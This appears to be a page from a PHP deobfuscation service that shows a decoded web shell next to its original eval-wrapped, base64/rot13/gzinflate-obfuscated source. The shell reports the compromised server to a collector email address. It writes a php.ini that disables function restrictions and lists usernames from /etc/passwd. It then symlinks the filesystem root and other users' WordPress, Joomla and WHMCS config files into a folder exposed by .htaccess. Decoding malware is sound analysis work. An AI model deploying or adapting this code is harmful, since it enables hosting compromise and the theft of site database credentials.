Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php #-----------------------------------------------------# # ============Mr.Simple C..

Decoded Output download

$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode = 'mrsimple@'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = '[email protected]';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode
Reply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);
 ?>
<title>--==[[Mr.Simple Cyber4rt]]==--</title>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="SHORTCUT ICON" href="http://2.bp.blogspot.com/_OoNYJfsEuXI/TLGUge5UFdI/AAAAAAAAAY0/fCmNi6fnkp4/s400/indonesia.gif" type="image"></head>
<body><style>
    body { background-color:transparan;background:#000;background-image: url("http://oi58.tinypic.com/1jnv3q.jpg");background-position: center;    background-attachment: fixed;background-repeat: no-repeat; } 
	.tabnez{ margin:30px auto 0 auto;border: 1px solid #333333; color: #00ff00; 
	-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;}
	body,td,th {font-family: Verdana;font-size: 12px;color: #00FF00;font-weight: bold;}
	input {BORDER-RIGHT:#00FF00 1px solid;BORDER-TOP:#00FF00 1px solid;BORDER-LEFT:#00FF00 1px solid;BORDER-BOTTOM: #00FF00 1px solid;BACKGROUND-COLOR: #111111;COLOR: #00FF00;font: 8pt Verdana;}
    </style>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>'
<html>
    <head>
        <?php
echo $head;
echo '
 
<table width="100%" cellspacing="0" cellpadding="0" >
 
            
 
       <td width="100%" align=center valign="top" rowspan="1">
           <font color=red size=5 face="comic sans ms"><b>--==[[Mr.Simple Cyber4rt Config Getting]]==--</font><br/><font color=yellow size=5 face="comic sans ms"><b>  File Killer By</font><div><font color=white size=6 face="Curlz MT"><b>-=]]./Navi3s Outsid3r with ./4dry N3t]]=-</font> <div>
 
        <td height="10" align="left"></td></tr><tr><td
        width="100%" align="center" valign="top" rowspan="1"><font
        color="red" face="comic sans ms"size="1"><b>
        <font color=red>
 
           </table>
        
 
';
?>
<body bgcolor=black><h3 style="text-align:center"><font color=red size=3 face="comic sans ms"><div align=center><table><tr><td><Welcome To Mr.Simple&trade; Config Getting</font><br></td></tr></table>
<form method=post><font color=red size=3 face="comic sans ms">Link to php.ini &darr;</font><p>
<input type=submit name=ini value="use to Generate PHP.ini" /></form>
<form method=post><font color=red size=3 face="comic sans ms">Link to get username &darr; </font><p>
    <input type=submit name="usre" value="use to Extract usernames" /></form>
 
    <?php
if (isset($_POST['ini'])) {
    $r = fopen('php.ini', 'w');
    $rr = " disbale_functions=none ";
    fwrite($r, $rr);
    $link = "<a href=php.ini><font color=red size=3 face=\"comic sans ms\"><u>Open on newtab PHP.INI</u></font></a>";
    echo $link;
}
?>
 
 
    <?php
if (isset($_POST['usre'])) {
?><form method=post>
    <textarea rows=10 cols=50 name=user  style="background:#daffbf;color:#295F00;border:2px #295F00  dashed;line-height:1.5em;padding:5px;"><?php $users = file("/etc/passwd");
    foreach ($users as $user) {
        $str = explode(":", $user);
        echo $str[0] . "
";
    }
?></textarea><br><br>
    <input type=submit name=su value="Get Config" /></form>
    <?php
} ?>
    <?php
error_reporting(0);
echo "<font color=red size=3 face=\"harrington\">";
if (isset($_POST['su'])) {
    mkdir('Mr.Simple', 0777);
    $rr = " Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
    $g = fopen('Mr.Simple/.htaccess', 'w');
    fwrite($g, $rr);
    $Mbt = symlink("/", "Mr.Simple/root");
    $rt = "<a href=Mr.Simple/root><font color=red size=4 face=\"comic sans ms\"> Owner</font></a>";
    echo "Lihat folder symlink <br><u>$rt</u>";
    $dir = mkdir('Mr.Simple', 0777);
    $r = " Options all 
 DirectoryIndex Sux.html 
 AddType text/plain .php 
 AddHandler server-parsed .php 
  AddType text/plain .html 
 AddHandler txt .html 
 Require None 
 Satisfy Any";
    $f = fopen('Mr.Simple/.htaccess', 'w');
    fwrite($f, $r);
    $consym = "<a href=Mr.Simple/><font color=red size=4 face=\"comic sans ms\">configuration files</font></a>";
    echo "<br>Check Hasil Dibawah &darr;<br><u><font color=blue size=3 face=\"comic sans ms\">$consym</font></u>";
    $usr = explode("
", $_POST['user']);
    $configuration = array("wp-config.php", "wordpress/wp-config.php", "configuration.php", "blog/wp-config.php", "bot/dataLog.php", "refresh.php", "dataLog.php", "joomla/configuration.php", "vb/includes/config.php", "includes/config.php", "conf_global.php", "inc/config.php", "config.php", "Settings.php", "sites/default/settings.php", "whm/configuration.php", "whmcs/configuration.php", "support/configuration.php", "whmc/WHM/configuration.php", "whm/WHMCS/configuration.php", "whm/whmcs/configuration.php", "support/configuration.php", "clients/configuration.php", "client/configuration.php", "clientes/configuration.php", "cliente/configuration.php", "clientsupport/configuration.php", "billing/configuration.php", "admin/config.php");
    foreach ($usr as $uss) {
        $us = trim($uss);
        foreach ($configuration as $c) {
            $rs = "/home/" . $us . "/public_html/" . $c;
            $r = "Mr.Simple/" . $us . " .. " . $c;
            symlink($rs, $r);
        }
    }
}
?>
 <center><br><br><div class="info"><font face="comic sans ms">-=[ c0nfi9 sh3ll by <b>Mr.Simpl3 4rmy</b> ]=-</div><br>
<div class="jaya">&copy; <?php echo date('Y', time()); ?>Victim Flame's h4x0r</font></div></center><br><br>
</script>
</div>
</body>
</html>

Did this file decode correctly?

Original Code

<?php 
#-----------------------------------------------------#
# ============Mr.Simple Configur Getting============= #
# Jangan pernah mengubah tulisan tulisan ini
# Ingat jika ingin dihargai menghargailah
# Script Mr.Simple Configur Getting by Navis Outsider
# Script ini dibagikan secara gratis kepada kalian.
# Facebook	: http://www.facebook.com/navis.sid
# Thanks To Mr.Simple Cyber4rt Crew and Konsl3t_t34m
#-----------------------------------------------------#
@ini_set('output_buffering',0); 
@ini_set('display_errors', 0);
$mrsimple ="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";
eval(str_rot13(gzinflate(str_rot13(base64_decode(($mrsimple))))));
?>

Function Calls

ini_set 2
gzinflate 1
str_rot13 2
base64_decode 1

Variables

$mrsimple 3RnbZdpV9mxd5X/oRbwB11MSju1WBhCJyW+c2ZTj4Ng7vhUldrpbxqQltUPH..

Stats

MD5 6e38990bb7d0aa6af15d0e077a1cd5d4
Eval Count 1
Decode Time 91 ms